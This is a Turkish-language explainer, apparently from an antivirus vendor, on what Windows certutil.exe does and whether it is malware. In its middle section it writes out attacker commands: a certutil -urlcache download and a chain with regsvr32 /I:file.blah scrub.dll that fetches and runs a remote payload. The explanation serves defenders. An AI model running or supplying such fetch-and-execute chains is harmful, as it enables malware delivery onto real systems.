Certutil.exe, Microsoft Windows’ta kullanılan sertifikaları ve sertifika hizmetlerini yönetmek için kullanılan bir komut satırı aracıdır. Windows işletim sistemiyle birlikte gelir ve dijital sertifikalarla ilgili çeşitli görevleri yerine getirmek için kullanılabilir.
Certutil.exe, şunları içeren geniş bir işlev yelpazesi gerçekleştirmek için kullanılabilir:
- Sertifikaları yönetme: Certutil.exe, Windows sertifika deposunda depolanan sertifikaları yönetebilir. Bu, sertifikaları içe ve dışa aktarma, sertifikaları silme ve sertifika ayrıntılarını görüntüleme işlemlerini içerir.
- Sertifika iptal listelerini (CRL’ler) yönetme: Certutil.exe, yetkilileri tarafından iptal edilen sertifikaların listesi olan CRL’leri yönetmek için kullanılabilir.
- Sertifikaları doğrulama: Certutil.exe, dijital imzasını yetkilinin genel anahtarına karşı kontrol ederek bir sertifikanın geçerliliğini doğrulamak için kullanılabilir.
- Anahtar çiftleri oluşturma: Certutil.exe, dijital sertifikalarda kullanılmak üzere genel/özel anahtar çiftleri oluşturmak için kullanılabilir.
- Akıllı kartları yönetme: Certutil.exe, dijital sertifikaları depolayan akıllı kartları yönetmek için kullanılabilir.
Certutil.exe, Windows ortamlarında dijital sertifikaları ve sertifika hizmetlerini yönetmek için sistem yöneticileri ve güvenlik uzmanları tarafından yaygın olarak kullanılan güçlü bir araçtır.
Certutil.exe virüs mü?
Kurulum, yedekleme, silme ve yönetim dahil olmak üzere Windows’taki sertifikalar ve sertifika depolarıyla ilgili çeşitli işlevleri gerçekleştirmek için bu programı kullanabilirsiniz.
Certutil.exe gibi herhangi bir sistem aracı, kötü amaçlı yazılımlar tarafından kötü amaçlı faaliyetler gerçekleştirmek için kullanılabilir. Kötü amaçlı yazılım geliştiricileri, bir kompromize edilmiş sisteme ek kötü amaçlı yazılım indirip yüklemek, güvenlik önlemlerini atlamak veya hassas verileri dışarı çıkarmak için Certutil.exe’yi kullanabilirler.
CertUtil’in dikkate değer bir özelliği, uzaktaki URL’lerden sertifikalar dahil dosyaları indirme ve aşağıdaki komutu kullanarak yerel olarak kaydetme yeteneğidir:
certutil.exe -urlcache -split -f [URL] output.file
Örneğin, saldırganlar “certutil -urlcache -split -f [serverURL] file.blah” komutunu “regsvr32.exe /s /u /I:file.blah scrub.dll” ile birleştirerek hedef sisteme kötü amaçlı yazılımı indirip yürütebilirler.
Kötü amaçlı yazılım geliştiricileri tarafından kullanılan yaygın bir teknik, Certutil.exe’yi uzaktaki sunuculardan şifrelenmiş kötü amaçlı dosyaları indirmek ve çözmek için kullanmaktır. Bu, Certutil.exe’yi “-decode” parametresini kullanarak Base64 kodlu içeriği çözerek veya “-urlcache” parametresini kullanarak uzaktaki sunucudan bir dosya indirerek yapılabilir.
Ancak, Certutil.exe’nin kendisi kötü amaçlı yazılım değildir ve Windows ile birlikte gelen meşru bir sistem aracıdır. Genellikle System32 dizininde depolanır ve Microsoft tarafından imzalanır, bu da değiştirme veya değiştirme girişimlerinin bir güvenlik uyarısı tetikleyeceği anlamına gelir.
Sisteminizi Certutil.exe kullanan kötü amaçlı yazılımlardan korumak için, sisteminizi ve antivirüs yazılımınızı güncel tutmak, Gridinsoft Anti-Malware gibi güvenilir bir antivirüs yazılımı kullanmak ve internetten yazılım indirirken veya bilinmeyen göndericilerden e-posta ekleri açarken dikkatli olmak önemlidir.
